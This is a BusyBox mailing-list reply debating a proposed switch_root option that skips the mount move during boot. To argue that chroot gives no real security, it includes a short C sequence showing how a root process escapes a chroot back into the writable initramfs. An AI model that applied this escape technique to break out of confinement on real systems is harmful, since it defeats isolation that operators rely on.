Re: switch_root and mount move

Wed, 02 May 2012 10:02:12 -0700 

On 05/02/2012 11:21 AM, Sergey Naumov wrote:
> I have implemented a patch which adds -m option to switch_root which
> prevents it from making a mount-move.

If the mount move isn't needed, it shouldn't do it. If it is needed, it
should do it. Providing a knob to control something 99.9% of the
userbase have no idea even _exists_ seems less than ideal.

> I haven't noticed any changes in behavior of my system, but now I can
> do all necessary mounts in initramfs,

So you haven't noticed any changes in behavior, except for this change
in behavior...

I'm still unclear on what you're trying to do.

> then call rsbac_init as last but one statement (after that any mount
> call for root device would fail) and then call
> switch_root -m /newroot /sbin/init. So I have a chroot behavior, but
> also can benefit from switch_root's cleaning of initramfs content.

So you do something funky to make your filesystem immuntable, and this
prevents a mount --move from working on it.

Which is really weird because mount --move is a vfs option, not a
filesystem option.

>> It sounds like you're saying you _don't_ want to let people do "mount
>> --remount,rw /", that with the current switch_root you can and with your
>> proposed modification you can't?
> 
> Without -m option I would be reluctant to defer rsbac initialization
> to later boot stages and it is not so good in terms of security, I
> think.

Oh dear, "security".

You're aware you can break out of a simple chroot and get back into the
initramfs, right?

Dunno why you'd want to, but in C it's something like:
  mkdir("sub", 0700);
  chroot("sub");
  chdir("../../../../../../../../..");
  chroot(".");

Congratulations, you're in initramfs.  Because the kernel's chroot test
is for equality, not >= (which isn't a relationship dentries really
_have_ anyway), so if you move it below your current directory you can
ascend all the way to the root of the tree.

Even if you've deleted everyting out of it, initramfs is still writeable
to root.

I repeat: I have no clue what you're trying to accomplish here.

Rob
-- 
GNU/Linux isn't: Linux=GPLv2, GNU=GPLv3+, they can't share code.
Either it's "mere aggregation", or a license violation.  Pick one.
_______________________________________________
busybox mailing list
[email protected]
http://lists.busybox.net/mailman/listinfo/busybox

Reply via email to